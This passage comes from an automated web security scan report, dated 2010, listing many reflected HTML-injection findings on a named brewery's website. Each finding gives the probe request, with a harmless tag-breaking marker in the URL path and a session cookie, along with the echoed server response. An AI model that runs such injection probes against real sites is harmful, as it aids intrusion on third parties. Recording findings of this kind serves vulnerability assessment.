This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookb8c9b"><a>1c3467f82f1/content/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookb8c9b"><a>1c3467f82f1_page" class="facebookb8c9b">
...[SNIP]...

1.129. http://www.ninkasibrewing.com/facebook/content/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7836"><a>bb24dd3b3b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf7836"><a>bb24dd3b3b/content/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf7836"><a>bb24dd3b3b_page" class="facebookf7836">
...[SNIP]...

1.130. http://www.ninkasibrewing.com/facebook/content/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67062"><a>59511a09909 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook67062"><a>59511a09909/content/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:28 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook67062"><a>59511a09909_page" class="facebook67062">
...[SNIP]...

1.131. http://www.ninkasibrewing.com/facebook/content/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31fe0"><a>2eb4b172801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook31fe0"><a>2eb4b172801/content/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook31fe0"><a>2eb4b172801_page" class="facebook31fe0">
...[SNIP]...

1.132. http://www.ninkasibrewing.com/facebook/content/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f53d2"><a>1133f8e8031 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf53d2"><a>1133f8e8031/content/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf53d2"><a>1133f8e8031_page" class="facebookf53d2">
...[SNIP]...

1.133. http://www.ninkasibrewing.com/facebook/content/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 704d2"><a>ebeab4721f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook704d2"><a>ebeab4721f5/content/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook704d2"><a>ebeab4721f5_page" class="facebook704d2">
...[SNIP]...

1.134. http://www.ninkasibrewing.com/facebook/content/css/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1594"><a>1401768ab81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka1594"><a>1401768ab81/content/css/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka1594"><a>1401768ab81_page" class="facebooka1594">
...[SNIP]...

1.135. http://www.ninkasibrewing.com/facebook/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f005"><a>fa78dd29b61 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook9f005"><a>fa78dd29b61/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook9f005"><a>fa78dd29b61_page" class="facebook9f005">
...[SNIP]...

1.136. http://www.ninkasibrewing.com/facebook/content/css/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbe47"><a>8cda79bb80c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbbe47"><a>8cda79bb80c/content/css/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookbbe47"><a>8cda79bb80c_page" class="facebookbbe47">
...[SNIP]...

1.137. http://www.ninkasibrewing.com/facebook/content/css/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8ba"><a>7af1c205d94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7b8ba"><a>7af1c205d94/content/css/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook7b8ba"><a>7af1c205d94_page" class="facebook7b8ba">
...[SNIP]...

1.138. http://www.ninkasibrewing.com/facebook/content/css/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44ab5"><a>a58806edc78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook44ab5"><a>a58806edc78/content/css/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook44ab5"><a>a58806edc78_page" class="facebook44ab5">
...[SNIP]...

1.139. http://www.ninkasibrewing.com/facebook/content/css/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbbed"><a>dadadead8f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookfbbed"><a>dadadead8f3/content/css/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookfbbed"><a>dadadead8f3_page" class="facebookfbbed">
...[SNIP]...

1.140. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 233db"><a>e5397f42874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook233db"><a>e5397f42874/content/css/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook233db"><a>e5397f42874_page" class="facebook233db">
...[SNIP]...

1.141. http://www.ninkasibrewing.com/facebook/content/css/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6768c"><a>f97c43a5168 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook6768c"><a>f97c43a5168/content/css/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook6768c"><a>f97c43a5168_page" class="facebook6768c">
...[SNIP]...

1.142. http://www.ninkasibrewing.com/facebook/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bc93"><a>f6122ef7935 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook5bc93"><a>f6122ef7935/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook5bc93"><a>f6122ef7935_page" class="facebook5bc93">
...[SNIP]...

1.143. http://www.ninkasibrewing.com/facebook/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2ebb"><a>62bdc34784c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookb2ebb"><a>62bdc34784c/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookb2ebb"><a>62bdc34784c_page" class="facebookb2ebb">
...[SNIP]...

1.144. http://www.ninkasibrewing.com/facebook/content/img/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124c"><a>a5d48e2d007 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke124c"><a>a5d48e2d007/content/img/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke124c"><a>a5d48e2d007_page" class="facebooke124c">
...[SNIP]...

1.145. http://www.ninkasibrewing.com/facebook/content/img/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3145"><a>00514f46b2c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka3145"><a>00514f46b2c/content/img/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:52:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka3145"><a>00514f46b2c_page" class="facebooka3145">
...[SNIP]...

1.146. http://www.ninkasibrewing.com/facebook/content/img/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/content/css/ninkasi.css

Issue detail

